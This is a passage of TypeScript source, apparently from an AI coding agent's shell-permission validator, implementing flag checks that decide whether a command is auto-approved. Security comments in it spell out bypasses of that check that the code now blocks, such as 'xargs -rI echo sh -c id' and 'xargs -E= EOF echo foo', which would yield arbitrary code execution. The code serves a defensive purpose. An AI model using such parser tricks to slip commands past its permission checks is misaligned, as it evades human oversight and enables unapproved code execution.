return value === 'EOF'
|
|
1667
|
+
default:
|
|
1668
|
+
return false
|
|
1669
|
+
}
|
|
1670
|
+
}
|
|
1671
|
+
|
|
1672
|
+
/**
|
|
1673
|
+
* Validates the flags/arguments portion of a tokenized command against a config.
|
|
1674
|
+
* This is the flag-walking loop extracted from BashTool's isCommandSafeViaFlagParsing.
|
|
1675
|
+
*
|
|
1676
|
+
* @param tokens - Pre-tokenized args (from bash shell-quote or PowerShell AST)
|
|
1677
|
+
* @param startIndex - Where to start validating (after command tokens)
|
|
1678
|
+
* @param config - The safe flags config
|
|
1679
|
+
* @param options.commandName - For command-specific handling (git numeric shorthand, grep/rg attached numeric)
|
|
1680
|
+
* @param options.rawCommand - For additionalCommandIsDangerousCallback
|
|
1681
|
+
* @param options.xargsTargetCommands - If provided, enables xargs-style target command detection
|
|
1682
|
+
* @returns true if all flags are valid, false otherwise
|
|
1683
|
+
*/
|
|
1684
|
+
export function validateFlags(
|
|
1685
|
+
tokens: string[],
|
|
1686
|
+
startIndex: number,
|
|
1687
|
+
config: ExternalCommandConfig,
|
|
1688
|
+
options?: {
|
|
1689
|
+
commandName?: string
|
|
1690
|
+
rawCommand?: string
|
|
1691
|
+
xargsTargetCommands?: string[]
|
|
1692
|
+
},
|
|
1693
|
+
): boolean {
|
|
1694
|
+
let i = startIndex
|
|
1695
|
+
|
|
1696
|
+
while (i < tokens.length) {
|
|
1697
|
+
let token = tokens[i]
|
|
1698
|
+
if (!token) {
|
|
1699
|
+
i++
|
|
1700
|
+
continue
|
|
1701
|
+
}
|
|
1702
|
+
|
|
1703
|
+
// Special handling for xargs: once we find the target command, stop validating flags
|
|
1704
|
+
if (
|
|
1705
|
+
options?.xargsTargetCommands &&
|
|
1706
|
+
options.commandName === 'xargs' &&
|
|
1707
|
+
(!token.startsWith('-') || token === '--')
|
|
1708
|
+
) {
|
|
1709
|
+
if (token === '--' && i + 1 < tokens.length) {
|
|
1710
|
+
i++
|
|
1711
|
+
token = tokens[i]
|
|
1712
|
+
}
|
|
1713
|
+
if (token && options.xargsTargetCommands.includes(token)) {
|
|
1714
|
+
break
|
|
1715
|
+
}
|
|
1716
|
+
return false
|
|
1717
|
+
}
|
|
1718
|
+
|
|
1719
|
+
if (token === '--') {
|
|
1720
|
+
// SECURITY: Only break if the tool respects POSIX `--` (default: true).
|
|
1721
|
+
// Tools like pyright don't respect `--` — they treat it as a file path
|
|
1722
|
+
// and continue processing subsequent tokens as flags. Breaking here
|
|
1723
|
+
// would let `pyright -- --createstub os` auto-approve a file-write flag.
|
|
1724
|
+
if (config.respectsDoubleDash !== false) {
|
|
1725
|
+
i++
|
|
1726
|
+
break // Everything after -- is arguments
|
|
1727
|
+
}
|
|
1728
|
+
// Tool doesn't respect --: treat as positional arg, keep validating
|
|
1729
|
+
i++
|
|
1730
|
+
continue
|
|
1731
|
+
}
|
|
1732
|
+
|
|
1733
|
+
if (token.startsWith('-') && token.length > 1 && FLAG_PATTERN.test(token)) {
|
|
1734
|
+
// Handle --flag=value format
|
|
1735
|
+
// SECURITY: Track whether the token CONTAINS `=` separately from
|
|
1736
|
+
// whether the value is non-empty. `-E=` has `hasEquals=true` but
|
|
1737
|
+
// `inlineValue=''` (falsy). Without `hasEquals`, the falsy check at
|
|
1738
|
+
// line ~1813 would fall through to "consume next token" — but GNU
|
|
1739
|
+
// getopt for short options with mandatory arg sees `-E=` as `-E` with
|
|
1740
|
+
// ATTACHED arg `=` (it doesn't strip `=` for short options). Parser
|
|
1741
|
+
// differential: validator advances 2 tokens, GNU advances 1.
|
|
1742
|
+
//
|
|
1743
|
+
// Attack: `xargs -E= EOF echo foo` (zero permissions)
|
|
1744
|
+
// Validator: inlineValue='' falsy → consumes EOF as -E arg → i+=2 →
|
|
1745
|
+
// echo ∈ SAFE_TARGET_COMMANDS_FOR_XARGS → break → AUTO-ALLOWED
|
|
1746
|
+
// GNU xargs: -E attached arg=`=` → EOF is TARGET COMMAND → CODE EXEC
|
|
1747
|
+
//
|
|
1748
|
+
// Fix: when hasEquals is true, use inlineValue (even if empty) as the
|
|
1749
|
+
// provided arg. validateFlagArgument('', 'EOF') → false → rejected.
|
|
1750
|
+
// This is correct for all arg types: the user explicitly typed `=`,
|
|
1751
|
+
// indicating they provided a value (empty). Don't consume next token.
|
|
1752
|
+
const hasEquals = token.includes('=')
|
|
1753
|
+
const [flag, ...valueParts] = token.split('=')
|
|
1754
|
+
const inlineValue = valueParts.join('=')
|
|
1755
|
+
|
|
1756
|
+
if (!flag) {
|
|
1757
|
+
return false
|
|
1758
|
+
}
|
|
1759
|
+
|
|
1760
|
+
const flagArgType = config.safeFlags[flag]
|
|
1761
|
+
|
|
1762
|
+
if (!flagArgType) {
|
|
1763
|
+
// Special case: git commands support -<number> as shorthand for -n <number>
|
|
1764
|
+
if (options?.commandName === 'git' && flag.match(/^-\d+$/)) {
|
|
1765
|
+
// This is equivalent to -n flag which is safe for git log/diff/show
|
|
1766
|
+
i++
|
|
1767
|
+
continue
|
|
1768
|
+
}
|
|
1769
|
+
|
|
1770
|
+
// Handle flags with directly attached numeric arguments (e.g., -A20, -B10)
|
|
1771
|
+
// Only apply this special handling to grep and rg commands
|
|
1772
|
+
if (
|
|
1773
|
+
(options?.commandName === 'grep' || options?.commandName === 'rg') &&
|
|
1774
|
+
flag.startsWith('-') &&
|
|
1775
|
+
!flag.startsWith('--') &&
|
|
1776
|
+
flag.length > 2
|
|
1777
|
+
) {
|
|
1778
|
+
const potentialFlag = flag.substring(0, 2) // e.g., '-A' from '-A20'
|
|
1779
|
+
const potentialValue = flag.substring(2) // e.g., '20' from '-A20'
|
|
1780
|
+
|
|
1781
|
+
if (config.safeFlags[potentialFlag] && /^\d+$/.test(potentialValue)) {
|
|
1782
|
+
// This is a flag with attached numeric argument
|
|
1783
|
+
const flagArgType = config.safeFlags[potentialFlag]
|
|
1784
|
+
if (flagArgType === 'number' || flagArgType === 'string') {
|
|
1785
|
+
// Validate the numeric value
|
|
1786
|
+
if (validateFlagArgument(potentialValue, flagArgType)) {
|
|
1787
|
+
i++
|
|
1788
|
+
continue
|
|
1789
|
+
} else {
|
|
1790
|
+
return false // Invalid attached value
|
|
1791
|
+
}
|
|
1792
|
+
}
|
|
1793
|
+
}
|
|
1794
|
+
}
|
|
1795
|
+
|
|
1796
|
+
// Handle combined single-letter flags like -nr
|
|
1797
|
+
// SECURITY: We must NOT allow any bundled flag that takes an argument.
|
|
1798
|
+
// GNU getopt bundling semantics: when an arg-taking option appears LAST
|
|
1799
|
+
// in a bundle with no trailing chars, the NEXT argv element is consumed
|
|
1800
|
+
// as its argument. So `xargs -rI echo sh -c id` is parsed by xargs as:
|
|
1801
|
+
// -r (no-arg) + -I with replace-str=`echo`, target=`sh -c id`
|
|
1802
|
+
// Our naive handler previously only checked EXISTENCE in safeFlags (both
|
|
1803
|
+
// `-r: 'none'` and `-I: '{}'` are truthy), then `i++` consumed ONE token.
|
|
1804
|
+
// This created a parser differential: our validator thought `echo` was
|
|
1805
|
+
// the xargs target (in SAFE_TARGET_COMMANDS_FOR_XARGS → break), but
|
|
1806
|
+
// xargs ran `sh -c id`. ARBITRARY RCE with only Bash(echo:*) or less.
|
|
1807
|
+
//
|
|
1808
|
+
// Fix: require ALL bundled flags to have arg type 'none'. If any bundled
|
|
1809
|
+
// flag requires an argument (non-'none' type), reject the whole bundle.
|
|
1810
|
+
// This is conservative — it blocks `-rI` (xargs) entirely, but that's
|
|
1811
|
+
// the safe direction. Users who need `-I` can use it unbundled: `-r -I {}`.
|
|
1812
|
+
if (flag.startsWith('-') && !flag.startsWith('--') && flag.length > 2) {
|
|
1813
|
+
for (let j = 1; j < flag.length; j++) {
|
|
1814
|
+
const singleFlag = '-' + flag[j]
|
|
1815
|
+
const flagType = config.safeFlags[singleFlag]
|
|
1816
|
+
if (!flagType) {
|
|
1817
|
+
return false // One of the combined flags is not safe
|
|
1818
|
+
}
|
|
1819
|
+
// SECURITY: Bundled flags must be no-arg type. An arg-taking flag
|
|
1820
|
+
// in a bundle consumes the NEXT token in GNU getopt, which our
|
|
1821
|
+
// handler doesn't model. Reject to avoid parser differential.
|
|
1822
|
+
if (flagType !== 'none') {
|
|
1823
|
+
return false // Arg-taking flag in a bundle — cannot safely validate
|
|
1824
|
+
}
|
|
1825
|
+
}
|
|
1826
|
+
i++
|
|
1827
|
+
continue
|
|
1828
|
+
} else {
|
|
1829
|
+
return false // Unknown flag
|
|
1830
|
+
}
|
|
1831
|
+
}
|
|
1832
|
+
|
|
1833
|
+
// Validate flag arguments
|
|
1834
|
+
if (flagArgType === 'none') {
|
|
1835
|
+
// SECURITY: hasEquals covers `-FLAG=` (empty inline). Without it,
|
|
1836
|
+
// `-FLAG=` with 'none' type would pass (inlineValue='' is falsy).
|
|
1837
|
+
if (hasEquals) {
|
|
1838
|
+
return false // Flag should not have a value
|
|
1839
|
+
}
|
|
1840
|
+
i++
|
|
1841
|
+
} else {
|
|
1842
|
+
let argValue: string
|
|
1843
|
+
// SECURITY: Use hasEquals (not inlineValue truthiness). `-E=` must
|
|
1844
|
+
// NOT consume next token — the user explicitly provided empty value.
|
|
1845
|
+
if (hasEquals) {
|
|
1846
|
+
argValue = inlineValue
|
|
1847
|
+
i++
|
|
1848
|
+
} else {
|
|
1849
|
+
// Check if next token is the argument
|
|
1850
|
+
if (
|
|
1851
|
+
i + 1 >= tokens.length ||
|
|
1852
|
+
(tokens[i + 1] &&
|
|
1853
|
+
tokens[i + 1]!.startsWith('-') &&
|
|
1854
|
+
tokens[i + 1]!.length > 1 &&
|
|
1855
|
+
FLAG_PATTERN.test(tokens[i + 1]!))
|
|
1856
|
+
) {
|
|
1857
|
+
return false // Missing required argument
|
|
1858
|
+
}
|
|
1859
|
+
argValue = tokens[i + 1] || ''
|
|
1860
|
+
i += 2
|
|
1861
|
+
}
|
|
1862
|
+
|
|
1863
|
+
// Defense-in-depth: For string arguments, reject values that start with '-'
|
|
1864
|
+
// This prevents type confusion attacks where a flag marked as 'string'
|
|
1865
|
+
// but actually takes no arguments could be used to inject dangerous flags
|
|
1866
|
+
// Exception: git's --sort flag can have values starting with '-' for reverse sorting
|
|
1867
|
+
if (flagArgType === 'string' && argValue.startsWith('-')) {
|
|
1868
|
+
// Special case: git's --sort flag allows - prefix for reverse sorting
|
|
1869
|
+
if (
|
|
1870
|
+
flag === '--sort' &&
|
|
1871
|
+
options?.commandName === 'git' &&
|
|
1872
|
+
argValue.match(/^-[a-zA-Z]/)
|
|
1873
|
+
) {
|
|
1874
|
+
// This looks like a reverse sort (e.g., -refname, -version:refname)
|
|
1875
|
+
// Allow it if the rest looks like a valid sort key
|
|
1876
|
+
} else {
|
|
1877
|
+
return false
|
|
1878
|
+
}
|
|
1879
|
+
}
|
|
1880
|
+
|
|
1881
|
+
// Validate argument based on type
|
|
1882
|
+
if (!validateFlagArgument(argValue, flagArgType)) {
|
|
1883
|
+
return false
|
|
1884
|
+
}
|
|
1885
|
+
}
|
|
1886
|
+
} else {
|
|
1887
|
+
// Non-flag argument (like revision specs, file paths, etc.) - this is allowed
|
|
1888
|
+
i++
|
|
1889
|
+
}
|
|
1890
|
+
}
|
|
1891
|
+
|
|
1892
|
+
return true
|
|
1893
|
+
}
|